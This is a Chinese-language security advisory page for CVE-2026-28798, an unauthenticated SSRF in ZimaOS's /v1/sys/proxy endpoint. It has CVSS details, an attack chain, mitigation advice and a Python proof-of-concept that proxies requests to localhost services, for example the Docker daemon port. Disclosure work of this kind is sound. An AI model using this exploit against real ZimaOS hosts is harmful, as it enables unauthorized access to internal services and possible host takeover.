IPBUF安全漏洞报告
English
CVE-2026-28798 CVSS 9.0 严重

CVE-2026-28798 ZimaOS代理端点SSRF漏洞

披露日期: 2026-04-03

漏洞信息

漏洞编号
CVE-2026-28798
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
9.0 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ZimaOS

相关标签

SSRFZimaOSProxy AbuseCriticalCVE-2026-28798

漏洞概述

ZimaOS在1.5.3版本之前存在SSRF漏洞。其Web接口暴露的/v1/sys/proxy代理端点可被滥用,通过Cloudflare Tunnel向内部localhost服务发起请求。当产品通过Cloudflare Tunnel暴露在互联网上时,攻击者利用此漏洞可在无需认证的情况下访问内部端点和敏感本地服务,造成严重安全风险。

技术细节

该漏洞源于ZimaOS的Web管理界面中实现的代理功能(/v1/sys/proxy)。该端点缺乏对目标地址的严格校验,允许攻击者通过构造特定的恶意请求,将服务器作为代理去访问其内部回环地址(localhost/127.0.0.1)上的敏感服务。由于攻击向量通过网络(AV:N),且无需用户交互(UI:N)和认证(PR:N),结合Cloudflare Tunnel的配置,攻击者可以绕过网络边界防御。这使得原本仅限内部访问的管理接口、API或服务直接暴露给远程攻击者,导致机密性、完整性和可用性全面受损(C:H/I:H/A:H)。

攻击链分析

STEP 1
侦察
攻击者发现通过Cloudflare Tunnel暴露在互联网上的ZimaOS实例。
STEP 2
漏洞利用
攻击者向/v1/sys/proxy端点发送特制的HTTP请求,目标地址设为内部localhost(如127.0.0.1)。
STEP 3
代理转发
ZimaOS服务器接收请求,未进行严格校验即将请求转发至内部本地服务。
STEP 4
获取数据
攻击者收到内部服务的响应数据,实现未经授权的敏感信息访问或进一步控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_ssrf(target_url, internal_url): """ PoC for CVE-2026-28798 Exploits the /v1/sys/proxy endpoint to access internal localhost services. """ proxy_endpoint = f"{target_url}/v1/sys/proxy" # Payload structure may vary based on implementation, assuming a JSON body with a target URL payload = { "url": internal_url, # e.g., http://127.0.0.1:8080 "method": "GET" } try: print(f"[*] Sending request to {proxy_endpoint} to reach {internal_url}") response = requests.post(proxy_endpoint, json=payload, timeout=10) if response.status_code == 200: print("[+] Request successful!") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target vulnerable instance target = "http://<VULNERABLE-ZIMAOS-HOST>" internal_target = "http://127.0.0.1:2375" # Example: Docker daemon port exploit_ssrf(target, internal_target)

影响范围

ZimaOS < 1.5.3

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界处阻断外部对/v1/sys/proxy端点的访问,或者暂时关闭Cloudflare Tunnel服务,直到完成补丁更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表